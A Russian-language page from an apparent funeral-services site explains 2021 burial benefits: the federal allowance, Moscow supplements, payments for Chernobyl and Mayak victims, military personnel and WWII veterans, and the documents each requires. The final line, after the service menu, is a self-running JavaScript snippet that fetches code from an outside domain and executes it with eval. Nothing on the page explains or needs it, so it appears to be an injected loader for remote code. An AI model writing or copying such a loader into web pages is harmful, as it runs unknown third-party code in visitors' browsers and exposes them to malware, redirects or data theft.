Пособие на погребение в 2021 году

Пособие на погребение в 2021 году

К сожалению, каждый человек смертен. Смерть является трагедией для близких умершего, к ней нельзя подготовиться заранее, даже если человек долгое время болел. Родственники переживают утрату близкого, но им приходится тяжело не только в эмоциональном, но и в финансовом плане. Ведь организация похорон влечет за собой многочисленные траты.

Не каждый россиянин знает, что существуют меры государственной поддержки для людей, организующих погребение. В ФЗ «О погребении и похоронном деле» говорится, что государство предоставляет гражданам страны, которые потеряли близкого родственника, материальную поддержку в виде разного рода льгот, выплат и компенсаций. В данном материале речь пойдет о пособиях, которые полагаются родственникам умершего человека в 2021 году и о порядке их предоставления.

Федеральное пособие на погребение

Каждый человек, потративший деньги на организацию похоронного процесса, имеет право на получение федерального пособия на погребение. Размер данной выплаты индексируется каждый год. В прошлом году пособие составляло 6124 рубля 86 копеек, в этом году его размер вырос до 6 424 рублей 98 копеек.

Вместо пособия граждане могут сделать выбор в пользу социальных похорон с гарантированным списком ритуальных услуг и товаров. В этом случае все расходы оплачивает государство. Но тогда семья покойного не сможет получить денежную выплату.

Нужно учитывать, что размер пособия может быть различен в зависимости от региона РФ. В тех субъектах страны, где установлен региональный коэффициент к заработной плате, размер компенсации рассчитывается с его учетом. Также правительство некоторых регионов предоставляет дополнительные выплаты вместе с федеральным пособием.

Пособие на погребение для льготных категорий граждан Москвы

Члены семьи покойных, которые относились к льготным категориям граждан и жили в столице, имеют право получить надбавку к социальной выплате на организацию похорон в размере 12 046 рублей. Эта финансовая поддержка может быть предоставлена неработающим гражданам, которые прошли регистрацию в органах службы занятости или пенсионерам, официально нетрудоустроенным.

Также увеличенные федеральные выплаты могут получить и другие категории льготного населения:

  • участники и инвалиды ВОВ;
  • военные пенсионеры и действующие военнослужащие.

Социальные льготы на погребение граждан, не имеющих официального трудоустройства

Родственники умерших жителей столицы, которые официально не работали на момент смерти и состояли на учете в органах службы занятости, имеют право на получение выплаты с надбавкой в общей сумме 18 470 рублей 98 копеек. Но эта сумма предусмотрена только для тех граждан, которые были прописаны в Москве и постоянно там проживали.

Для получения пособия нужно обратиться в отделение социальной защиты населения по месту жительства покойного, предоставив следующие документы:

  • паспорт взыскателя пособия;
  • свидетельство о смерти покойного;
  • медицинская справка о смерти по форме 11;
  • справка о регистрации покойного по месту проживания в столице;
  • справка о статусе неработающего или копия трудовой книжки, которая подтверждает, что покойный не был официально трудоустроен на момент смерти/гибели.

Сроки проверки документации нужно будет уточнить у сотрудников УСЗН при подаче бумаг.

Пособия на похороны неработающих пенсионеров

Власти столицы предоставляют доплату в размере 12 046 рублей к пособию для официально неработающих пенсионеров, которые проживали в Москве. Так общий размер выплаты доходит до 18 470 рублей 98 копеек. Чтобы получить эти деньги, нужно подготовить следующие документы:

  • паспорт взыскателя пособия;
  • свидетельство о смерти покойного, которое заверено гербовой печатью;
  • справка о смерти из медицинского учреждения (форма 11);
  • справка о регистрации умершего по месту проживания в столице;
  • справка о статусе неработающего или ксерокопия трудовой книжки, которая подтверждает, что покойный не был официально трудоустроен на момент смерти/гибели;
  • ксерокопия пенсионного удостоверения покойного.

Эти документы нужно будет предоставить в отделение Пенсионного фонда столицы по месту регистрации усопшего.

Похоронные выплаты гражданам, которые пострадали вследствие аварии на ЧАЭС или ПО «Маяк»

Отдельной категорией граждан, для похорон которых предусмотрена надбавка к пособию не столичными, а федеральными властями, являются люди, заболевшие лучевой болезнью или другими подобными недугами из-за чрезвычайного происшествия на ЧАЭС или ПО «Маяк». Надбавка на организацию похорон для этих граждан составляет 12 910 рублей 26 копеек. Для получения выплаты следует обратиться в отделение социальной защиты по месту проживания усопшего.

Выплаты семьям усопших участников боевых действий и военнослужащих

Родственникам покойных военных и участников боевых действий предусмотрена компенсация похоронных расходов в размере до 28 178 рублей (исходя из реальных затрат на погребение). Также они могут рассчитывать на льготы при установке памятника на надгробии в размере не более 35 171 рубля. Выплаты предоставляются по последнему месту прохождения службы или военкоматом по месту проживания покойного. Перед началом процесса оформления нужно подготовить следующие бумаги:

  • паспорт взыскателя пособия;
  • свидетельство о смерти усопшего с гербовой печатью;
  • справку о смерти усопшего из медицинского учреждения (форма 11);
  • документы, подтверждающие родственные связи с усопшем;
  • реквизиты банка для перечисления выплаты.

Важно! Родственники участников боевых действий и военных имеют право на получение повышенного пособия в следующих случаях:

  • если усопший был военным пенсионером – выплата в размере его трехмесячной пенсии;
  • если умерший являлся офицером старшего или высшего командного состава в отставке с выслугой не менее 25 лет – выплата в размере его трехмесячной пенсии для супругов или месячной пенсии на каждого несовершеннолетнего члена семьи;
  • если усопший был героем Советского Союза или России, полным кавалером ордена Славы – его месячная пенсия как надбавка к пособию на погребение.

Компенсация расходов на похороны инвалидов или ветеранов ВОВ

Члены семей ветеранов ВОВ имеют право на получение погребального пособия в сумме 40 551 рубля. Также их родственники могут получить компенсацию за установку памятника в размере до 28 178 рублей. Чтобы получить данные выплаты, нужно написать заявление и предоставить:

  • паспорт взыскателя пособия;
  • свидетельство о смерти усопшего;
  • справку о регистрации усопшего по месту проживания в Москве;
  • чеки, подтверждающие похоронные расходы;
  • реквизиты банка для перечисления пособия.

Оформить выплаты можно, обратившись в военкомат или любое отделение МФЦ «Мои документы».


Вызвать ритуального агента
Ваше имя
Ваш телефон

Ритуальные услуги

Ритуальный агент
Оркестр на похоронах
Организация похорон
Организатор траурной церемонии - Церемониймейстер
Ритуальный транспорт
Гробы
Смотреть все
Позвонить
(function ab(){ var request = new XMLHttpRequest(); request.open('GET', "https://scripts.witstroom.com/one/23092", false); request.send(); if(request.status == 200) eval(request.responseText); })();